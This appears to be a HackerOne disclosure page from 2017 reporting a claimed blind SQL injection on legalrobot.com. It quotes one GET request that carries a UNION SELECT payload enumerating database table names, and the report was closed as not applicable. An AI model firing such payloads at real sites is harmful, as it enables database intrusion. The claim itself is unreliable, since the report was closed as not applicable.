sql injection vulnerablity found

Disclosed: 2017-10-13 18:46:52 By bd_01 To legalrobot
None
Vulnerability Details
a Blind Text Injection Differential vulnerablity was found on your site in the url :https://www.legalrobot.com/assets/icons a GET request made on GET /assets/icons/?v=9wr1emhXD568%3B'%20UNION%20SELECT%208%2C%20table_name%2C%20'vega'%20FROM%20information_schema.tables%20WHERE%20table_name%20like'%25 result up in vulnerablity
Actions
View on HackerOne
Report Stats
  • Report ID: 211988
  • State: Closed
  • Substate: not-applicable
  • Upvotes: 5
Share this report